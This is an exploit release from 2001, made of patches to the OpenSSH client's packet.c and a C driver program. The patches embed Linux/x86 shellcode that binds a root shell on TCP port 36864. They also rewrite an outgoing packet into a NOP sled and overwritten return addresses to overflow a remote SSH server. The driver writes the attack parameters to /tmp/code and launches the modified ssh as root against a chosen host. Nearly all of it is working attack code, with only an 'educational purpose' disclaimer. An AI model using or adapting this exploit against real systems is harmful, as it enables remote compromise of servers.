# Exploit code in the form of ssh client patches by Hugo Dias < bsphere@clix.pt >. - --- packet.c Sat Oct 14 06:23:12 2000 +++ packet.c Tue Feb 20 09:33:00 2001 @@ -68,6 +68,85 @@ #define DBG(x) #endif + +/* + * Linux/x86 + * TCP/36864 portshell (old, could be optimized further) + */ + +char shellcode[] = /* anathema */ +/* main: */ +"\xeb\x72" /* jmp callz */ +/* start: */ +"\x5e" /* popl %esi */ + + /* socket() */ +"\x29\xc0" /* subl %eax, %eax */ +"\x89\x46\x10" /* movl %eax, 0x10(%esi) */ +"\x40" /* incl %eax */ +"\x89\xc3" /* movl %eax, %ebx */ +"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ +"\x40" /* incl %eax */ +"\x89\x46\x08" /* movl %eax, 0x08(%esi) */ +"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ +"\xb0\x66" /* movb $0x66, %al */ +"\xcd\x80" /* int $0x80 */ + + /* bind() */ +"\x43" /* incl %ebx */ +"\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */ +"\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */ +"\x88\x46\x08" /* movb %al, 0x08(%esi) */ +"\x29\xc0" /* subl %eax, %eax */ +"\x89\xc2" /* movl %eax, %edx */ +"\x89\x46\x18" /* movl %eax, 0x18(%esi) */ +"\xb0\x90" /* movb $0x90, %al */ +"\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */ +"\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */ +"\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */ +"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ +"\xb0\x66" /* movb $0x66, %al */ +"\xcd\x80" /* int $0x80 */ + + /* listen() */ +"\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */ +"\x43" /* incl %ebx */ +"\x43" /* incl %ebx */ +"\xb0\x66" /* movb $0x66, %al */ +"\xcd\x80" /* int $0x80 */ + + /* accept() */ +"\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */ +"\x89\x56\x10" /* movl %edx, 0x10(%esi) */ +"\xb0\x66" /* movb $0x66, %al */ +"\x43" /* incl %ebx */ +"\xcd\x80" /* int $0x80 */ + + /* dup2(s, 0); dup2(s, 1); dup2(s, 2); */ +"\x86\xc3" /* xchgb %al, %bl */ +"\xb0\x3f" /* movb $0x3f, %al */ +"\x29\xc9" /* subl %ecx, %ecx */ +"\xcd\x80" /* int $0x80 */ +"\xb0\x3f" /* movb $0x3f, %al */ +"\x41" /* incl %ecx */ +"\xcd\x80" /* int $0x80 */ +"\xb0\x3f" /* movb $0x3f, %al */ +"\x41" /* incl %ecx */ +"\xcd\x80" /* int $0x80 */ + + /* execve() */ +"\x88\x56\x07" /* movb %dl, 0x07(%esi) */ +"\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */ +"\x87\xf3" /* xchgl %esi, %ebx */ +"\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */ +"\xb0\x0b" /* movb $0x0b, %al */ +"\xcd\x80" /* int $0x80 */ + +/* callz: */ +"\xe8\x89\xff\xff\xff" /* call start */ +"/bin/sh"; + + /* * This variable contains the file descriptors used for communicating with * the other side. connection_in is used for reading; connection_out for @@ -125,6 +204,9 @@ /* Session key information for Encryption and MAC */ Kex *kex = NULL; +/* Packet Number */ +int count = 0; + void packet_set_kex(Kex *k) { @@ -461,6 +543,8 @@ unsigned int checksum; u_int32_t rand = 0; + count++; + /* * If using packet compression, compress the payload of the outgoing * packet. @@ -1172,7 +1256,64 @@ void packet_write_poll() { - - int len = buffer_len(&output); + int len; + char buf[50],*p,*ptr; + char code[270000]; + long sz; + FILE *f; + + if (count == 2) + { + f = fopen("/tmp/code","r"); + fgets(buf,28,f); + fclose(f); + + sz = GET_32BIT(&buf[24]); + buffer_clear(&output); + buffer_append(&output,code,sz); + + len = buffer_len(&output); + + ptr = buffer_ptr(&output); + + for(p = ptr + 4 ; p < ptr + GET_32BIT(&buf[16]) ; p+=8) + { + *p=buf[0]; + *(p+1)=buf[1]; + *(p+2)=buf[2]; + *(p+3)=buf[3]; + *(p+4)=buf[4]; + *(p+5)=buf[5]; + *(p+6)=buf[6]; + *(p+7)=buf[7]; + } + + sz = ((GET_32BIT(&buf[20]) + 8) & ~7); + + for(p = p ; p < ptr + sz ; p+=8) + { + *p=buf[8]; + *(p+1)=buf[9]; + *(p+2)=buf[10]; + *(p+3)=buf[11]; + *(p+4)=buf[12]; + *(p+5)=buf[13]; + *(p+6)=buf[14]; + *(p+7)=buf[15]; + } + + sz = len - GET_32BIT(&buf[20]); + + memset(p,'\x90',sz); + memcpy(p+sz-strlen(shellcode)-16,&shellcode,strlen(shellcode)); + memcpy(ptr,&buf[20],4); + + count++; + } + + len = buffer_len(&output); + + if (len > 0) { len = write(connection_out, buffer_ptr(&output), len); if (len <= 0) { @@ -1299,3 +1440,4 @@ max_packet_size = s; return s; } + - ------------------------------------------------------------------------------------ /* THIS FILE IS FOR EDUCATIONAL PURPOSE ONLY. BlackSphere - Hugo Oliveira Dias Tue Feb 20 16:18:00 2001 Email: bsphere@clix.pt Homepage: http://planeta.clix.pt/bsphere Exploit code for using the modified ssh */ #include #include #include #include #include #include /* Path to modified ssh */ #define PATH_SSH "./ssh" int main(int argc,char *argv[]) { int f; int port; unsigned long addr,*ptr; char *buffer,*aux,ch,*ssh; int i; if (argc < 8) { printf("\nUsage : %s \ \n\n",argv[0]); fflush(stdout); _exit(0); } port=atoi(argv[6]); buffer = (char *) malloc(29); ptr = (unsigned long *) buffer; *(ptr++) = 1543007393 + strtoul(argv[1],0,10); *(ptr++) = 0; *(ptr++) = strtoul(argv[7],0,10); *(ptr++) = 0; *(ptr++) = 16520 + strtoul(argv[2],0,10); *(ptr++) = strtoul(argv[3],0,10); *(ptr++) = strtoul(argv[4],0,10); buffer[29]=0; for(i = 0 ; i < 27 ; i+=4) { aux = buffer + i; ch=*aux; *aux=*(aux+3); *(aux+3)=ch; ch=*(aux+1); *(aux+1)=*(aux+2); *(aux+2)=ch; } printf("\nSaved Eip : &h + %u",1543007393 + strtoul(argv[1],0,10)); printf("\nReturn Address : 0x%xxxxx",(16520+strtoul(argv[2],0,10))/8); printf("\nPacket Length : %u",(strtoul(argv[3],0,10)+8) & ~7); printf("\nUsername Length : %u\n\n",strtoul(argv[4],0,10)); fflush(stdout); f = open("/tmp/code",O_RDWR | O_CREAT,S_IRWXU); write(f,buffer,28); close(f); ssh = (char *) malloc(strlen(PATH_SSH) + 100 + strlen(argv[5])); strcpy(ssh,PATH_SSH); sprintf(ssh+strlen(PATH_SSH)," -p %i -v -l root %s",port,argv[5]); printf("%s\n",ssh); system(ssh); _exit(0); }